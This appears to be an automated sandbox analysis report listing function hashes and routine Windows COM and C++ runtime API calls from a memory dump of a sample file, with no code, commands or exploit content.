                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Variant$ArrayClearSafe$ElementInit$CreateDestroyVector
                                            • String ID:
                                            • API String ID: 551789342-0
                                            • Opcode ID: 97f3198fedfd5678e0f362d40c55caa02f61f906926823fba1a55d434160381a
                                            • Instruction ID: a6215de5e679caf52c42e07711481584f31229078b3140c697b20840a622fd16
                                            • Opcode Fuzzy Hash: 97f3198fedfd5678e0f362d40c55caa02f61f906926823fba1a55d434160381a
                                            • Instruction Fuzzy Hash: 96518872608201AFC701CF64C944B9BBBF9EFC9728F118619F948AB750D730E905CBA2
                                            APIs
                                            • SafeArrayGetLBound.OLEAUT32(00000000,?,?), ref: 6CEB6C8B
                                            • SafeArrayGetUBound.OLEAUT32(00000000,?,?), ref: 6CEB6CA6
                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 6CEB6CC7
                                              • Part of subcall function 6CEB5760: std::tr1::_Xweak.LIBCPMT ref: 6CEB5769
                                            • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6CEB6CF9
                                              • Part of subcall function 6CEF9BB5: _malloc.LIBCMT ref: 6CEF9BCF
                                            • SafeArrayDestroy.OLEAUT32(00000000), ref: 6CEB6F13
                                            • InterlockedCompareExchange.KERNEL32(6CF3C6A4,45524548,4B4F4F4C), ref: 6CEB6F34
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArraySafe$BoundData$AccessCompareDestroyExchangeInterlockedUnaccessXweak_mallocstd::tr1::_
                                            • String ID: .l$ .l
                                            • API String ID: 2722669376-2945158243
                                            • Opcode ID: e298952b90e308d6a49d777f297a36b0e1296aa57743d0efc6b60dcfaebdd02c
                                            • Instruction ID: 665c7ceca6aacd30a321ee8a841cdde0230fe947bb40d860ba2507665f5a9cad
                                            • Opcode Fuzzy Hash: e298952b90e308d6a49d777f297a36b0e1296aa57743d0efc6b60dcfaebdd02c
                                            • Instruction Fuzzy Hash: A8D1EFB1A102059FDB04CFA4C981BEE77B9EF45308F348569E919EBB80D774E905CBA1
                                            APIs
                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CEB84BF
                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEB84D2
                                            • SafeArrayGetElement.OLEAUT32 ref: 6CEB850A
                                              • Part of subcall function 6CEB3A90: SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CEB3B71
                                              • Part of subcall function 6CEB3A90: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEB3B83
                                              • Part of subcall function 6CEB69C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6CEB6A08
                                              • Part of subcall function 6CEB69C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEB6A15
                                              • Part of subcall function 6CEB69C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CEB6A41
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE63
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE73
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE86
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE99
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEAC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEBF
                                              • Part of subcall function 6CEADFB0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6CEADFF6
                                              • Part of subcall function 6CEADFB0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEAE003
                                              • Part of subcall function 6CEADFB0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CEAE02F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArraySafe$Bound$Destroy$Element
                                            • String ID:
                                            • API String ID: 959723449-0
                                            • Opcode ID: eb4e2d738d3d81ba18cc71cbc90b5abafe9e508053808edfff09320f27a6aaa4
                                            • Instruction ID: 3aa5995d154473a305c297a15ee04e6741f78cdf6ffe5ef7f2b67b0440c3a944
                                            • Opcode Fuzzy Hash: eb4e2d738d3d81ba18cc71cbc90b5abafe9e508053808edfff09320f27a6aaa4
                                            • Instruction Fuzzy Hash: C6C18F74A012059FDB10DF68CD80FA9B7B9AF85308F308599E919FB786CB71E985CB50
                                            APIs
                                            • VariantInit.OLEAUT32(?), ref: 6CEB41AF
                                            • VariantInit.OLEAUT32(?), ref: 6CEB41B5
                                            • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CEB41C0
                                            • SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CEB41F5
                                            • VariantClear.OLEAUT32(?), ref: 6CEB4201
                                            • std::tr1::_Xweak.LIBCPMT ref: 6CEB4450
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB446D
                                            • VariantClear.OLEAUT32(?), ref: 6CEB447D
                                            • VariantClear.OLEAUT32(?), ref: 6CEB4483
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Variant$ArrayClearSafe$Init$CreateDestroyElementVectorXweakstd::tr1::_
                                            • String ID:
                                            • API String ID: 1774866819-0
                                            • Opcode ID: 78b11c7478e6ab1eae823c7e956470da449f65e3253a8a775db51448cbfc044e
                                            • Instruction ID: 1bc8960bb8751cc7cfca56a182659abd884971cac4af510a96c5396f11feaae3
                                            • Opcode Fuzzy Hash: 78b11c7478e6ab1eae823c7e956470da449f65e3253a8a775db51448cbfc044e
                                            • Instruction Fuzzy Hash: 31B13775A006499FCB14DF98C884EAAB7F5BF8D310F15856DE50AABB90DA34F841CB60
                                            APIs
                                            • VariantInit.OLEAUT32(?), ref: 6CEBC88F
                                            • VariantInit.OLEAUT32(?), ref: 6CEBC895
                                            • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CEBC8A0
                                            • SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CEBC8D5
                                            • VariantClear.OLEAUT32(?), ref: 6CEBC8E1
                                            • std::tr1::_Xweak.LIBCPMT ref: 6CEBCB1C
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBCB39
                                            • VariantClear.OLEAUT32(?), ref: 6CEBCB49
                                            • VariantClear.OLEAUT32(?), ref: 6CEBCB4F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Variant$ArrayClearSafe$Init$CreateDestroyElementVectorXweakstd::tr1::_
                                            • String ID:
                                            • API String ID: 1774866819-0
                                            • Opcode ID: 74a678c7a253dd49f250105ec9cbffe5c353b26a59fea35b691626cb25473791
                                            • Instruction ID: 7864d73406864d48faeeca5b3ed3b02e09fb693c36b2fd5ee79acb619d86f571
                                            • Opcode Fuzzy Hash: 74a678c7a253dd49f250105ec9cbffe5c353b26a59fea35b691626cb25473791
                                            • Instruction Fuzzy Hash: D6B13875A046099FCB14DF98C984EBEB7F5BF8D310F15856CE506ABB91C634B841CB60
                                            APIs
                                            • VariantInit.OLEAUT32(?), ref: 6CEBC56F
                                            • VariantInit.OLEAUT32(?), ref: 6CEBC575
                                            • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CEBC580
                                            • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CEBC5B5
                                            • VariantClear.OLEAUT32(?), ref: 6CEBC5C1
                                            • std::tr1::_Xweak.LIBCPMT ref: 6CEBC7D4
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBC7F1
                                            • VariantClear.OLEAUT32(?), ref: 6CEBC801
                                            • VariantClear.OLEAUT32(?), ref: 6CEBC807
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Variant$ArrayClearSafe$Init$CreateDestroyElementVectorXweakstd::tr1::_
                                            • String ID:
                                            • API String ID: 1774866819-0
                                            • Opcode ID: 83aedd6a4b0091825b834b3679ac3a803feb18a174cfaee20d635b6da43e8509
                                            • Instruction ID: 7bd64ac9999304d0b49b38d9a7abcd1fdb2c822af18c26743720429a7e30095f
                                            • Opcode Fuzzy Hash: 83aedd6a4b0091825b834b3679ac3a803feb18a174cfaee20d635b6da43e8509
                                            • Instruction Fuzzy Hash: 32A14975A046099FCB14DFA8C884EBAB7F9BF8D310F15856CE506ABB50C734B841CB60
                                            APIs
                                            • VariantInit.OLEAUT32(?), ref: 6CEB68B2
                                            • VariantInit.OLEAUT32(?), ref: 6CEB68BD
                                            • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CEB68D7
                                            • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CEB68FD
                                            • VariantClear.OLEAUT32(?), ref: 6CEB6909
                                            • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CEB6923
                                            • SafeArrayDestroy.OLEAUT32(00000000), ref: 6CEB6981
                                            • VariantClear.OLEAUT32(?), ref: 6CEB699E
                                            • VariantClear.OLEAUT32(?), ref: 6CEB69A4
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Variant$ArraySafe$Clear$ElementInit$CreateDestroyVector
                                            • String ID:
                                            • API String ID: 3529038988-0
                                            • Opcode ID: 9496b37e3f3cec220d603b31d0926dc4e8e347dc5310668fb09f9751b748fc03
                                            • Instruction ID: f67ad633416f79294b8ee3202882cd1c459a3b16391e40d87a3839d42dc09a29
                                            • Opcode Fuzzy Hash: 9496b37e3f3cec220d603b31d0926dc4e8e347dc5310668fb09f9751b748fc03
                                            • Instruction Fuzzy Hash: A3417DB2E00209AFDB01DFA5C844AEEBBB8FF99324F154119E905F7740E771A905CBA0
                                            APIs
                                            • VariantInit.OLEAUT32(?), ref: 6CEADB5E
                                            • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CEADB6E
                                            • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CEADB82
                                            • SafeArrayDestroy.OLEAUT32(00000000), ref: 6CEADBF1
                                            • VariantClear.OLEAUT32(?), ref: 6CEADBFB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArraySafe$Variant$ClearCreateDestroyElementInitVector
                                            • String ID: 9Kl$1l
                                            • API String ID: 182531043-2405703077
                                            • Opcode ID: ff6b637934ccfeeb55a4da09d5b6a1acb3338e7494e1e86a13aa20908e9fcc56
                                            • Instruction ID: 3ae8540f844e8ca1092200a766f698c422af76554187acf717f10eb180b878c4
                                            • Opcode Fuzzy Hash: ff6b637934ccfeeb55a4da09d5b6a1acb3338e7494e1e86a13aa20908e9fcc56
                                            • Instruction Fuzzy Hash: 1931A57AA00205AFD701DF95C844EEEBBF9FF89724F158159ED11AB700D734A901CBA0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Variant$ClearInit
                                            • String ID:
                                            • API String ID: 2610073882-0
                                            • Opcode ID: 9456429eaaa911abd40fe35348b3e9818f4f256f5d6c8237cf03c14e7bfa1434
                                            • Instruction ID: 682f827f06271e716cebc6abc3cbe6680a6e79ee1bc494cd7ae1d5bca07d2e87
                                            • Opcode Fuzzy Hash: 9456429eaaa911abd40fe35348b3e9818f4f256f5d6c8237cf03c14e7bfa1434
                                            • Instruction Fuzzy Hash: FCC148727087009FC300EF98C88095AB7F5BFC9708F258A4DE5989B765D771E84ACB92
                                            APIs
                                              • Part of subcall function 6CEF9BB5: _malloc.LIBCMT ref: 6CEF9BCF
                                            • std::tr1::_Xweak.LIBCPMT ref: 6CEA1B53
                                            • std::_Xinvalid_argument.LIBCPMT ref: 6CEA1B5D
                                            • std::exception::exception.LIBCMT ref: 6CEA1C43
                                            • __CxxThrowException@8.LIBCMT ref: 6CEA1C58
                                            Strings
                                            • invalid vector<T> subscript, xrefs: 6CEA1B58
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Exception@8ThrowXinvalid_argumentXweak_mallocstd::_std::exception::exceptionstd::tr1::_
                                            • String ID: invalid vector<T> subscript
                                            • API String ID: 3098024973-3016609489
                                            • Opcode ID: b0c7f577d584db1019a61e2eb453c250312b86e4218c9a60381797cd8321dc73
                                            • Instruction ID: 9fbb82f36d07775f44f7ba1a60c0a73f36940e08716a45f1ec0c799af42908ee
                                            • Opcode Fuzzy Hash: b0c7f577d584db1019a61e2eb453c250312b86e4218c9a60381797cd8321dc73
                                            • Instruction Fuzzy Hash: E2222775900709DFCB14CFE4C4809EEBBB5BF44314F218A5DD45AABB50E774AA89CB90
                                            APIs
                                            • _malloc.LIBCMT ref: 6CEF9BCF
                                              • Part of subcall function 6CEF9D66: __FF_MSGBANNER.LIBCMT ref: 6CEF9D7F
                                              • Part of subcall function 6CEF9D66: __NMSG_WRITE.LIBCMT ref: 6CEF9D86
                                              • Part of subcall function 6CEF9D66: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,00000000,?,6CEF9BD4,6CE91290,67D4BDE6), ref: 6CEF9DAB
                                            • std::exception::exception.LIBCMT ref: 6CEF9C04
                                            • std::exception::exception.LIBCMT ref: 6CEF9C1E
                                            • __CxxThrowException@8.LIBCMT ref: 6CEF9C2F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                            • String ID: Ql
                                            • API String ID: 615853336-532227320
                                            • Opcode ID: 300daa17bfdc90f1c8271fb690d810f747b76f6802fd254c9c0780743ad37481
                                            • Instruction ID: 2263be4087347037e84fce1e555bca0eba9779f9c1bce0bbfb1a12aa8ccb06aa
                                            • Opcode Fuzzy Hash: 300daa17bfdc90f1c8271fb690d810f747b76f6802fd254c9c0780743ad37481
                                            • Instruction Fuzzy Hash: BEF0F431911509AADF50EF64C821AED7AB9AB8271CF30080DE4A097F80CB718A4A8690
                                            APIs
                                            • SafeArrayCreateVector.OLEAUT32(00000011,00000000,00000000), ref: 6CEA6C73
                                            • SafeArrayAccessData.OLEAUT32(00000000,<ll), ref: 6CEA6C87
                                            • _memmove.LIBCMT ref: 6CEA6C9A
                                            • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6CEA6CA3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArraySafe$Data$AccessCreateUnaccessVector_memmove
                                            • String ID: <ll
                                            • API String ID: 3147195435-3419007484
                                            • Opcode ID: 5e4b6bfbb15caf23edc2e0ae0e3d47a595d8c7ea6478c178e9cc62931fc5a81b
                                            • Instruction ID: 85910e033972bdc39ccb69b226d39aafe190acae3c658740aff1f10bffdf15b0
                                            • Opcode Fuzzy Hash: 5e4b6bfbb15caf23edc2e0ae0e3d47a595d8c7ea6478c178e9cc62931fc5a81b
                                            • Instruction Fuzzy Hash: 3EF05E75711214BBEB115F91DC8AF973FBDEFD6B64F018015FA188E640E6B0D5009BA1
                                            APIs
                                              • Part of subcall function 6CEF9BB5: _malloc.LIBCMT ref: 6CEF9BCF
                                            • std::exception::exception.LIBCMT ref: 6CEC2206
                                            • __CxxThrowException@8.LIBCMT ref: 6CEC2221
                                              • Part of subcall function 6CEC6480: __CxxThrowException@8.LIBCMT ref: 6CEC6518
                                              • Part of subcall function 6CEC6480: __CxxThrowException@8.LIBCMT ref: 6CEC6558
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
